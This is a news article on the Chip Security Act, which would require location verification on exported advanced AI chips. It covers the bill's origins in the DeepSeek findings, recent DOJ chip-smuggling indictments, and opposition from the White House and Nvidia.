DeepSeek changed the calculation. When the House Select Committee on China concluded in early 2025 that the Chinese AI company had trained its flagship model on restricted Nvidia AI chips that should never have reached it, Congress stopped treating chip smuggling as an enforcement failure and started treating it as a legislative emergency — one that arrived on the House Foreign Affairs Committee's desk, this week. The House Foreign Affairs Committee passed the Chip Security Act with bipartisan support on Thursday, advancing legislation to curb the smuggling of American semiconductors to foreign adversaries. The bill was introduced in May 2025 as a direct response to concerns raised by the Select Committee on China in its report on DeepSeek, which concluded the company used advanced Nvidia chips restricted from export to China to develop its AI model.

Here's What the AI Chip Security Act Is

The core mechanism the Chip Security Act puts forward is location verification — the requirement that advanced AI chips exported from the United States carry a technical security mechanism, whether implemented in software, firmware, or hardware, that continuously confirms where the device physically sits. The bill requires the Secretary of Commerce to mandate, within 180 days of enactment, that any covered integrated circuit product be outfitted with chip security mechanisms implementing location verification before it is exported, reexported, or transferred to a foreign country. Covered products include chips classified under Export Control Classification Numbers 3A090, 3A001.z, 4A090, and 4A003.z — the precise classifications that cover Nvidia's H100 and equivalent advanced AI accelerators. The bill also requires any person who received a license to export a covered chip to promptly report to the Under Secretary of Industry and Security if they obtain credible information that the product has been diverted to an unauthorized end-user or location. Mandatory reporting closes a gap that currently allows diversion to go unreported until investigators stumble across it independently — sometimes years after the fact. The bill arrives with enforcement urgency already established on its behalf. Earlier this week, the Justice Department charged three individuals for conspiring to smuggle billions of dollars' worth of advanced AI chips to China through Thailand.

Read: Three Individuals Charged for Trying to Smuggle ‘America-Made’ AI Tech Worth $170M

In November 2025, the DOJ had also indicted three Chinese nationals for smuggling high-tech chips through Thailand and Malaysia to China. Both cases used the trans-shipment model — routing restricted chips through a third country to obscure China as the final destination — demonstrating that existing export controls fail at the physical enforcement layer precisely where location verification would apply. The broader legislative push sits in deliberate tension with the Trump administration. The White House AI czar, David Sacks, in January retweeted criticism of the Chip Security Act, suggesting it handicaps Trump's ability to strategically position the U.S. favorably against China. House Foreign Affairs Committee Chairman Brian Mast pushed back directly, saying the talking points amplified by Sacks matched those he had heard from Nvidia. Nvidia CEO Jensen Huang has repeatedly argued to lawmakers that U.S. chip sales to China entrench American technology as the global standard — a position congressional China hawks view as commercially motivated reasoning that ignores military end-use risk. The Trump administration approved the export of higher-tier H200 chips to China in January 2026, walking back the previous administration's blanket restrictions. That decision prompted fierce backlash on Capitol Hill, where lawmakers have been seeking congressional control over export licensing — authority that currently belongs entirely to the Department of Commerce. The Chip Security Act represents Congress's attempt to build a verification infrastructure capable of surviving executive policy oscillations by embedding accountability into the hardware itself rather than relying solely on licensing decisions made at the administrative level. Industry groups including the Information Technology and Innovation Council have warned that a government chip-tracking mandate creates the impression of deepening U.S. government control over the American AI stack, potentially pushing countries that should be core customers toward alternative suppliers. Whether that concern outweighs the demonstrated reality of $170 million AI chip smuggling conspiracies routed through Southeast Asian shell companies is now a question for the full House floor.